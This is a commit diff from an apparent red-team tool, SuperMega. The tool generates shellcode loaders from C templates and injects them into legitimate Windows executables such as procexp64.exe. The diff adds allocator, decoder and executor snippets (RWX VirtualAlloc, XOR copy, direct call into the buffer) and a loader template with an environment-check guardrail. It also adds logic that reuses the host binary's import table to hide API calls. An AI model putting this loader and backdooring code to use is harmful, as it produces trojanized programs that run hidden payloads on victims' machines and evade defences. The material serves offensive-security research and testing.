admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-03 01:27:11 +00:00
Code Issues Packages Projects Releases Wiki Activity

feature: templates, project

Browse Source
This commit is contained in:
Dobin
2024-02-10 13:43:35 +00:00
parent 1eba815e93
commit 72e4c4ffe5
13 changed files with 276 additions and 218 deletions
Download Patch File Download Diff File Expand all files Collapse all files
helper.py
+16 -2
View File
@@ -5,9 +5,10 @@ import shutil
import pathlib import pathlib
import sys import sys
import pefile import pefile
import glob
from config import config from config import config
from project import project
SHC_VERIFY_SLEEP = 0.1 SHC_VERIFY_SLEEP = 0.1
@@ -94,7 +95,10 @@ def run_process_checkret(args):
print(ret.stdout) print(ret.stdout)
print(ret.stderr) print(ret.stderr)
raise Exception("Command failed") raise Exception("Command failed")
if project.show_command_output:
print("> " + " ".join(args))
print(ret.stdout)
print(ret.stderr)
def try_start_shellcode(shc_file): def try_start_shellcode(shc_file):
print("--[ Blindly execute shellcode: {} ]".format(shc_file)) print("--[ Blindly execute shellcode: {} ]".format(shc_file))
@@ -114,3 +118,13 @@ def file_readall_binary(filepath) -> bytes:
with open(filepath, "rb") as f: with open(filepath, "rb") as f:
data = f.read() data = f.read()
return data return data
def delete_all_files_in_directory(directory_path):
files = glob.glob(os.path.join(directory_path, '*'))
for file_path in files:
try:
os.remove(file_path)
#print(f"Deleted {file_path}")
except Exception as e:
print(f"Error deleting {file_path}: {e}")
model.py
+14 -8
View File
@@ -3,18 +3,24 @@ import pehelper
import pefile import pefile
from enum import Enum from enum import Enum
class FilePath(str):
pass
class AllocStyle(Enum): class AllocStyle(Enum):
RWX = 1 RWX = "rwx_1"
RW_X = 2 #RW_X = "rw_x"
REUSE = 3 #REUSE = "reuse"
class ExecStyle(Enum): class ExecStyle(Enum):
CALL = 1, CALL = "direct_1",
JMP = 2, #JMP = 2,
FIBER = 3, #FIBER = 3,
class CopyStyle(Enum): class DecoderStyle(Enum):
SIMPLE = 1 PLAIN_1 = "plain_1"
XOR_1 = "xor_1"
class DataRefStyle(Enum): class DataRefStyle(Enum):
APPEND = 1 APPEND = 1
observer.py
+1 -17
View File
@@ -31,23 +31,7 @@ class Observer():
self.idx += 1 self.idx += 1
def __str__(self): def __str__(self):
s = "" s = "<todo>"
s += "{} {}\n\n".format(
self.capabilities_a,
self.options,)
s += "Main: {} Payload Orig: {} Payload Cleanup: {}\n".format(
len(self.main_c),
len(self.payload_asm_orig),
len(self.payload_asm_cleanup),
)
s += "fixup: {} loader: {} final: {}\n".format(
len(self.payload_asm_fixup),
len(self.loader_shellcode),
len(self.final_shellcode),
)
return s return s
phases/ctoasm.py
+75 -10
View File
@@ -2,21 +2,83 @@ from helper import *
from config import config from config import config
import os import os
import pprint import pprint
from observer import observer
from jinja2 import Template
from project import project
from model import * from model import *
use_templates = True
def create_c_from_template():
plugin_allocator = ""
plugin_decoder = ""
plugin_executor = ""
with open("plugins/allocator/rwx_1.c", "r", encoding='utf-8') as file:
plugin_allocator = file.read()
with open("plugins/decoder/plain_1.c", "r", encoding='utf-8') as file:
plugin_decoder = file.read()
with open("plugins/executor/direct_1.c", "r", encoding='utf-8') as file:
plugin_executor = file.read()
if project.source_style == SourceStyle.peb_walk:
if use_templates:
with open("source/peb_walk/template.c", 'r', encoding='utf-8') as file:
template_content = file.read()
observer.add_text("main_c_template", template_content)
template = Template(template_content)
rendered_template = template.render({
'plugin_allocator': plugin_allocator,
'plugin_decoder': plugin_decoder,
'plugin_executor': plugin_executor,
})
with open("build/main.c", "w", encoding='utf-8') as file:
file.write(rendered_template)
observer.add_text("main_c_rendered", rendered_template)
else:
observer.add_text("main_c", file_readall_text("source/peb_walk/main.c"))
shutil.copy("source/peb_walk/main.c", "build/main.c")
shutil.copy("source/peb_walk/peb_lookup.h", "build/peb_lookup.h")
elif project.source_style == SourceStyle.iat_reuse:
if use_templates:
with open("source/iat_reuse/template.c", 'r', encoding='utf-8') as file:
template_content = file.read()
observer.add_text("main_c_template", template_content)
template = Template(template_content)
rendered_template = template.render({
'plugin_allocator': plugin_allocator,
'plugin_decoder': plugin_decoder,
'plugin_executor': plugin_executor,
})
with open("build/main.c", "w", encoding='utf-8') as file:
file.write(rendered_template)
observer.add_text("main_c_rendered", rendered_template)
else:
observer.add_text("main_c", file_readall_text("source/iat_reuse/main.c"))
shutil.copy("source/iat_reuse/main.c", "build/main.c")
def make_c_to_asm(c_file, asm_file, payload_len, capabilities: ExeCapabilities): def make_c_to_asm(c_file, asm_file, payload_len, capabilities: ExeCapabilities):
print("--[ C to ASM: {} -> {} ]".format(c_file, asm_file)) print("--[ C to ASM: {} -> {} ]".format(c_file, asm_file))
asm = { asm = {
"initial": "", "initial": "",
"templated": "",
"cleanup": "", "cleanup": "",
"fixup": "", "fixup": "",
} }
#
# Phase 1: C To Assembly # Phase 1: C To Assembly
print("---[ Compile: {} ]".format(c_file)) print("---[ Make ASM from C: {} ]".format(c_file))
run_process_checkret([ run_process_checkret([
config.get("path_cl"), config.get("path_cl"),
"/c", "/c",
@@ -30,6 +92,14 @@ def make_c_to_asm(c_file, asm_file, payload_len, capabilities: ExeCapabilities):
return return
asm["initial"] = file_readall_text(asm_file) asm["initial"] = file_readall_text(asm_file)
# Phase 1.2: Assembly fixup
print("---[ Fixup : {} ]".format(asm_file))
if not fixup_asm_file(asm_file, payload_len, capabilities):
print("Error: Fixup failed")
return
else:
asm["fixup"] = file_readall_text(asm_file)
# Phase 1.1: Assembly cleanup # Phase 1.1: Assembly cleanup
asm_clean_file = asm_file + ".clean" asm_clean_file = asm_file + ".clean"
print("---[ Cleanup: {} ]".format(asm_file)) print("---[ Cleanup: {} ]".format(asm_file))
@@ -45,13 +115,7 @@ def make_c_to_asm(c_file, asm_file, payload_len, capabilities: ExeCapabilities):
shutil.move(asm_clean_file, asm_file) shutil.move(asm_clean_file, asm_file)
asm["cleanup"] = file_readall_text(asm_file) asm["cleanup"] = file_readall_text(asm_file)
# Phase 1.2: Assembly fixup
print("---[ Fixup : {} ]".format(asm_file))
if not fixup_asm_file(asm_file, payload_len, capabilities):
print("Error: Fixup failed")
return
else:
asm["fixup"] = file_readall_text(asm_file)
return asm return asm
@@ -83,8 +147,6 @@ def fixup_asm_file(filename, payload_len, capabilities: ExeCapabilities):
# Fix call # Fix call
if "call" in lines[idx] and "__imp_" in lines[idx]: if "call" in lines[idx] and "__imp_" in lines[idx]:
func_name = lines[idx][lines[idx].find("__imp_")+6:].rstrip() func_name = lines[idx][lines[idx].find("__imp_")+6:].rstrip()
print(" > Replace func name: {}".format(func_name))
exeCapability = capabilities.get(func_name) exeCapability = capabilities.get(func_name)
if exeCapability == None: if exeCapability == None:
print("Error Capabilities not: {}".format(func_name)) print("Error Capabilities not: {}".format(func_name))
@@ -92,6 +154,9 @@ def fixup_asm_file(filename, payload_len, capabilities: ExeCapabilities):
randbytes: bytes = os.urandom(6) randbytes: bytes = os.urandom(6)
lines[idx] = bytes_to_asm_db(randbytes) + "\r\n" lines[idx] = bytes_to_asm_db(randbytes) + "\r\n"
exeCapability.id = randbytes exeCapability.id = randbytes
print(" > Replace func name: {} with {}".format(
func_name, randbytes))
# replace external reference with shellcode reference # replace external reference with shellcode reference
for idx, line in enumerate(lines): for idx, line in enumerate(lines):
phases/shctoexe.py
+11 -5
View File
@@ -1,11 +1,17 @@
from helper import * from helper import *
import shutil import shutil
import pprint import pprint
from pehelper import * from pehelper import *
from model import * from model import *
from project import project
def inject_exe(shc_file, exe_in, exe_out, mode, exe_capabilities: ExeCapabilities): def inject_exe(shc_file: FilePath):
exe_in: FilePath = project.inject_exe_in
exe_out: FilePath = project.inject_exe_out
exe_capabilities: ExeCapabilities = project.exe_capabilities
print("--[ Injecting: {} into: {} -> {} ]".format( print("--[ Injecting: {} into: {} -> {} ]".format(
shc_file, exe_in, exe_out shc_file, exe_in, exe_out
)) ))
@@ -15,13 +21,13 @@ def inject_exe(shc_file, exe_in, exe_out, mode, exe_capabilities: ExeCapabilitie
# inject shellcode into exe_out with redbackdoorer # inject shellcode into exe_out with redbackdoorer
# python3.exe .\redbackdoorer.py 1,1 main-clean-append.bin .\exes\procexp64-a.exe # python3.exe .\redbackdoorer.py 1,1 main-clean-append.bin .\exes\procexp64-a.exe
subprocess.run([ run_process_checkret([
"python3.exe", "python3.exe",
"redbackdoorer.py", "redbackdoorer.py",
mode, project.inject_mode,
shc_file, shc_file,
exe_out exe_out
], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) ])
# get code section of exe_out # get code section of exe_out
code = get_code_section(exe_out) code = get_code_section(exe_out)
@@ -30,7 +36,7 @@ def inject_exe(shc_file, exe_in, exe_out, mode, exe_capabilities: ExeCapabilitie
# and re-implant it # and re-implant it
for cap in exe_capabilities.get_all().values(): for cap in exe_capabilities.get_all().values():
if not cap.id in code: if not cap.id in code:
print("Not found, abort") print("Capability ID {} not found, abort".format(cap.id))
raise Exception() raise Exception()
off = code.index(cap.id) off = code.index(cap.id)
plugins/allocator/rwx_1.c
+1
View File
@@ -0,0 +1 @@
char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40);
plugins/decoder/plain_1.c
+3
View File
@@ -0,0 +1,3 @@
for(int n=0; n<11223344; n++) {
dest[n] = supermega_payload[n];
}
plugins/decoder/xor_1.c
+3
View File
@@ -0,0 +1,3 @@
for (i=0; i<11223344; i++){
dest[i] = supermega_payload[i] ^ 0x42;
}
plugins/executor/direct_1.c
+1
View File
@@ -0,0 +1 @@
(*(void(*)())(dest))();
project.py
+36
View File
@@ -0,0 +1,36 @@
from model import *
class Project():
def __init__(self):
# User, generating normally
self.payload: FilePath = ""
self.source_style: SourceStyle = SourceStyle.peb_walk
self.alloc_style: AllocStyle = AllocStyle.RWX
self.exec_style: ExecStyle = ExecStyle.CALL
self.decoder_style: DecoderStyle = DecoderStyle.PLAIN_1
self.dataref_style: DataRefStyle = DataRefStyle.APPEND
self.inject: bool = False
self.inject_mode: str = "1,1"
self.inject_exe_in: FilePath = ""
self.inject_exe_out: FilePath = ""
self.exe_capabilities: ExeCapabilities = None
# debug
self.show_command_output = True
self.verify: bool = False
self.try_start_loader_shellcode: bool = False
self.try_start_final_shellcode: bool = False
self.try_start_final_infected_exe: bool = False
self.cleanup_files_on_start: bool = True
self.cleanup_files_on_exit: bool = True
self.generate_asm_from_c: bool = True
self.generate_shc_from_asm: bool = True
project = Project()
requirements.txt
+1
View File
@@ -1,3 +1,4 @@
pefile pefile
capstone capstone
keystone-engine keystone-engine
jinja2
source/iat_reuse/template.c
+56
View File
@@ -0,0 +1,56 @@
#include <Windows.h>
char *supermega_payload;
int main()
{
// Execution Guardrail: Env Check
wchar_t envVarName[] = {'U','S','E','R','P','R','O','F','I','L','E', 0};
wchar_t tocheck[] = {'C',':','\\','U','s','e','r','s','\\','h','a','c','k','e','r', 0}; // L"C:\\Users\\hacker"
WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency!
DWORD result = ((DWORD(WINAPI*)(LPCWSTR, LPWSTR, DWORD))GetEnvironmentVariableW)(envVarName, buffer, 1024);
if (result == 0) {
return 6;
}
if (mystrcmp(buffer, tocheck) != 0) {
return 6;
}
// char *dest = ...
{{ plugin_allocator }}
// dest[] = supermega_payload[]
// len: 0x11223344
{{ plugin_decoder }}
// dest[]
{{ plugin_executor }}
/*
// Copy shellcode
// ntdll.dll: VirtualAlloc()
char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40);
// 11223344 is a magic number which will be replaced in the asm source
// with the payload length.
for(int n=0; n<11223344; n++) {
dest[n] = supermega_payload[n];
}
// Exec shellcode
(*(void(*)())(dest))();
*/
return 0;
}
int mystrcmp(wchar_t* str1, wchar_t* str2) {
int i = 0;
while (str1[i] != L'\0' && str2[i] != L'\0') {
if (str1[i] != str2[i]) {
return 1;
}
i++;
}
return 0;
}
supermega.py
+58 -176
View File
@@ -12,138 +12,13 @@ from phases.ctoasm import *
from phases.asmtoshc import * from phases.asmtoshc import *
from phases.shctoexe import * from phases.shctoexe import *
from observer import observer from observer import observer
from project import project
options_default = {
"payload": "shellcodes/calc64.bin",
"verify": False,
# Temp
"source_style": SourceStyle.peb_walk,
# configuration
"alloc_style": AllocStyle.RWX,
"exec_style": ExecStyle.CALL,
"copy_style": CopyStyle.SIMPLE,
"dataref_style": DataRefStyle.APPEND,
# injecting into exe
"inject_exe": True,
"inject_mode": "1,1",
"inject_exe_in": "exes/procexp64.exe",
"inject_exe_out": "out/procexp64-a.exe",
"try_start_loader_shellcode": False, # without payload (Debugging)
"try_start_final_shellcode": False, # with payload (should work)
"try_start_final_infected_exe": True, # with payload (should work)
# cleanup
"cleanup_files_on_start": False,
"cleanup_files_on_exit": False,
# For debugging: Can disable some steps
"generate_asm_from_c": True,
"generate_shc_from_asm": True,
# Not working atm
"obfuscate_shc_loader": False,
"test_obfuscated_shc": False,
}
# VERIFY: STD
# This will verify if our loader works
# - payload shellcode will create a file c:\temp\a
options_verify_std = {
"payload": "shellcodes/createfile.bin",
"verify": True,
# Temp
"source_style": SourceStyle.peb_walk,
# configuration
"alloc_style": AllocStyle.RWX,
"exec_style": ExecStyle.CALL,
"copy_style": CopyStyle.SIMPLE,
"dataref_style": DataRefStyle.APPEND,
# testing
"try_start_loader_shellcode": False,
"try_start_final_shellcode": False,
"try_start_final_infected_exe": False,
# injecting into exe
"inject_exe": True,
"inject_mode": "1,1",
"inject_exe_in": "exes/procexp64.exe",
"inject_exe_out": "out/procexp64-a.exe",
# For debugging: Can disable some steps
"generate_asm_from_c": True, # phase 2
"generate_shc_from_asm": True, # phase 3
# cleanup
"cleanup_files_on_start": True,
"cleanup_files_on_exit": True, # all is just in out/
# doesnt work
"obfuscate_shc_loader": False,
"test_obfuscated_shc": False,
}
# VERIFY: IAT
# This will verify if our loader works
# - payload shellcode will create a file c:\temp\a
options_verify_iat = {
"payload": "shellcodes/createfile.bin",
"verify": True,
# Temp
"source_style": SourceStyle.peb_walk,
# configuration
"alloc_style": AllocStyle.RWX,
"exec_style": ExecStyle.CALL,
"copy_style": CopyStyle.SIMPLE,
"dataref_style": DataRefStyle.APPEND,
# testing
"try_start_loader_shellcode": False,
"try_start_final_shellcode": False,
"try_start_final_infected_exe": False,
# injecting into exe
"inject_exe": True,
"inject_mode": "1,1",
"inject_exe_in": "exes/iattest-full.exe", # important
"inject_exe_out": "out/iatttest-full-a.exe",
# For debugging: Can disable some steps
"generate_asm_from_c": True,
"generate_shc_from_asm": True,
# cleanup
"cleanup_files_on_start": True,
"cleanup_files_on_exit": True, # all is just in out/
# doesnt work
"obfuscate_shc_loader": False,
"test_obfuscated_shc": False,
}
options = None
main_c_file = os.path.join(build_dir, "main.c") main_c_file = os.path.join(build_dir, "main.c")
main_asm_file = os.path.join(build_dir, "main.asm") main_asm_file = os.path.join(build_dir, "main.asm")
main_exe_file = os.path.join(build_dir, "main.exe") main_exe_file = os.path.join(build_dir, "main.exe")
main_shc_file = os.path.join(build_dir, "main.bin") main_shc_file = os.path.join(build_dir, "main.bin")
debug_data = {
"original_exe": b"",
"infected_exe": b"",
}
def main(): def main():
print("Super Mega") print("Super Mega")
@@ -156,80 +31,90 @@ def main():
args = parser.parse_args() args = parser.parse_args()
if args.verify: if args.verify:
project.payload = "shellcodes/createfile.bin"
project.verify = True
project.try_start_final_infected_exe = False
project.try_start_final_shellcode = False
project.try_start_final_infected_exe = False
if args.verify == "std": if args.verify == "std":
options = options_verify_std project.source_style = SourceStyle.peb_walk
project.inject = True
project.inject_mode = "1,1"
project.inject_exe_in = "exes/procexp64.exe"
project.inject_exe_out = "out/procexp64-a.exe"
elif args.verify == "iat": elif args.verify == "iat":
options = options_verify_iat project.source_style = SourceStyle.iat_reuse
project.inject = True
project.inject_mode = "1,1"
project.inject_exe_in = "exes/iattest-full.exe"
project.inject_exe_out = "out/iatttest-full-a.exe"
else: else:
print("Unknown verify option {}, use std/iat".format(args.verify)) print("Unknown verify option {}, use std/iat".format(args.verify))
else: else:
options = options_default
if args.shellcode: if args.shellcode:
if not os.path.isfile(args.shellcode): if not os.path.isfile(args.shellcode):
print("Could not find: {}".format(args.shellcode)) print("Could not find: {}".format(args.shellcode))
return return
options["payload"] = args.shellcode project.payload = args.shellcode
if args.inject: if args.inject:
if not os.path.isfile(args.inject): if not os.path.isfile(args.inject):
print("Could not find: {}".format(args.inject)) print("Could not find: {}".format(args.inject))
return return
options["inject_exe"] = True project.inject = True
options["inject_exe_in"] = args.inject project.inject_exe_in = args.inject
options["inject_exe_out"] = args.inject.replace(".exe", ".infected.exe") project.inject_exe_out = args.inject.replace(".exe", ".infected.exe")
start(options) start()
def start(options): def start():
# Delete: all old files # Delete: all old files
if options["cleanup_files_on_start"]: if project.cleanup_files_on_start:
clean_files() clean_files()
delete_all_files_in_directory("logs/")
# Check: Destination EXE capabilities # Check: Destination EXE capabilities
capabilities = ExeCapabilities([ project.exe_capabilities = ExeCapabilities([
"GetEnvironmentVariableW", "GetEnvironmentVariableW",
"VirtualAlloc" "VirtualAlloc"
]) ])
capabilities.parse_from_exe(options["inject_exe_in"]) project.exe_capabilities.parse_from_exe(project.inject_exe_in)
capabilities.print() project.exe_capabilities.print()
if capabilities.has_all(): # choose which source / technique we gonna use
options["source_style"] = SourceStyle.iat_reuse if project.exe_capabilities.has_all():
project.source_style = SourceStyle.iat_reuse
else: else:
options["source_style"] = SourceStyle.peb_walk project.source_style = SourceStyle.peb_walk
observer.add_json("capabilities_a", capabilities) #observer.add_json("capabilities_a", project.exe_capabilities)
observer.add_json("options", options) #observer.add_json("options", options)
print("--[ SourceStyle: {}".format(options["source_style"].name)) print("--[ SourceStyle: {}".format(project.source_style.name))
# Copy: loader C files into working directory: build/ # Copy: loader C files into working directory: build/
if options["source_style"] == SourceStyle.peb_walk: create_c_from_template()
observer.add_text("main_c", file_readall_text("source/peb_walk/main.c"))
shutil.copy("source/peb_walk/main.c", "build/main.c")
shutil.copy("source/peb_walk/peb_lookup.h", "build/peb_lookup.h")
elif options["source_style"] == SourceStyle.iat_reuse:
observer.add_text("main_c", file_readall_text("source/iat_reuse/main.c"))
shutil.copy("source/iat_reuse/main.c", "build/main.c")
# Convert: C -> ASM # Convert: C -> ASM
if options["generate_asm_from_c"]: if project.generate_asm_from_c:
# Find payload size # Find payload size
with open(options["payload"], 'rb') as input2: with open(project.payload, 'rb') as input2:
data_payload = input2.read() data_payload = input2.read()
payload_length = len(data_payload) payload_length = len(data_payload)
#observer.add_text("payload_asm_orig", str(data_payload)) #observer.add_text("payload_asm_orig", str(data_payload))
asm = make_c_to_asm(main_c_file, main_asm_file, payload_length, capabilities) asm = make_c_to_asm(main_c_file, main_asm_file, payload_length, project.exe_capabilities)
observer.add_text("payload_asm_orig", asm["initial"]) observer.add_text("payload_asm_orig", asm["initial"])
observer.add_text("payload_asm_cleanup", asm["cleanup"]) observer.add_text("payload_asm_cleanup", asm["cleanup"])
observer.add_text("payload_asm_fixup", asm["fixup"]) observer.add_text("payload_asm_fixup", asm["fixup"])
# Convert: ASM -> Shellcode # Convert: ASM -> Shellcode
if options["generate_shc_from_asm"]: if project.generate_shc_from_asm:
code = make_shc_from_asm(main_asm_file, main_exe_file, main_shc_file) code = make_shc_from_asm(main_asm_file, main_exe_file, main_shc_file)
observer.add_code("generate_shc_from_asm", code) observer.add_code("generate_shc_from_asm", code)
# Try: Starting the shellcode (rarely useful) # Try: Starting the shellcode (rarely useful)
if options["try_start_loader_shellcode"]: if project.try_start_loader_shellcode:
try_start_shellcode(main_shc_file) try_start_shellcode(main_shc_file)
# SGN # SGN
@@ -241,11 +126,12 @@ def start(options):
# return # return
# Merge shellcode/loader with payload # Merge shellcode/loader with payload
if options["dataref_style"] == DataRefStyle.APPEND: if project.dataref_style == DataRefStyle.APPEND:
print("--[ Merge stager: {} + {} -> {} ] ".format(main_shc_file, options["payload"], main_shc_file)) print("--[ Merge stager: {} + {} -> {} ] ".format(
main_shc_file, project.payload, main_shc_file))
with open(main_shc_file, 'rb') as input1: with open(main_shc_file, 'rb') as input1:
data_stager = input1.read() data_stager = input1.read()
with open(options["payload"], 'rb') as input2: with open(project.payload, 'rb') as input2:
data_payload = input2.read() data_payload = input2.read()
print("---[ Size: Stager: {} and Payload: {} Sum: {} ]".format( print("---[ Size: Stager: {} and Payload: {} Sum: {} ]".format(
len(data_stager), len(data_payload), len(data_stager)+len(data_payload))) len(data_stager), len(data_payload), len(data_stager)+len(data_payload)))
@@ -255,13 +141,13 @@ def start(options):
output.write(data) output.write(data)
observer.add_code("final_shellcode", data) observer.add_code("final_shellcode", data)
if options["verify"] and options["source_style"] == SourceStyle.peb_walk: if project.verify and project.source_style == SourceStyle.peb_walk:
print("--[ Verify final shellcode ]") print("--[ Verify final shellcode ]")
if not verify_shellcode(main_shc_file): if not verify_shellcode(main_shc_file):
print("Could not verify, still continuing") print("Could not verify, still continuing")
#return #return
if options["try_start_final_shellcode"]: if project.try_start_final_shellcode:
print("--[ Test Append shellcode ]") print("--[ Test Append shellcode ]")
try_start_shellcode(main_shc_file) try_start_shellcode(main_shc_file)
@@ -269,24 +155,20 @@ def start(options):
shutil.copyfile(main_shc_file, os.path.join("out/", os.path.basename(main_shc_file))) shutil.copyfile(main_shc_file, os.path.join("out/", os.path.basename(main_shc_file)))
# inject merged loader into an exe # inject merged loader into an exe
if options["inject_exe"]: if project.inject:
debug_data["original_exe"] = file_readall_binary(options["inject_exe_in"]) #debug_data["original_exe"] = file_readall_binary(options["inject_exe_in"])
inject_exe( inject_exe(main_shc_file)
main_shc_file, if project.verify:
options["inject_exe_in"],
options["inject_exe_out"],
options["inject_mode"],
capabilities)
if options["verify"]:
print("--[ Verify final exe ]") print("--[ Verify final exe ]")
if verify_injected_exe(options["inject_exe_out"]): if verify_injected_exe(project.inject_exe_out):
debug_data["infected_exe"] = file_readall_binary(options["inject_exe_out"]) #debug_data["infected_exe"] = file_readall_binary(options["inject_exe_out"])
pass
if options["try_start_final_infected_exe"]: if project.try_start_final_infected_exe:
print("--[ Start infected exe ]") print("--[ Start infected exe ]")
subprocess.run([ subprocess.run([
options["inject_exe_out"], project.inject_exe_out,
], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
# dump the info i gathered # dump the info i gathered
@@ -295,7 +177,7 @@ def start(options):
file.close() file.close()
# delete files # delete files
if options["cleanup_files_on_exit"]: if project.cleanup_files_on_exit:
clean_files() clean_files()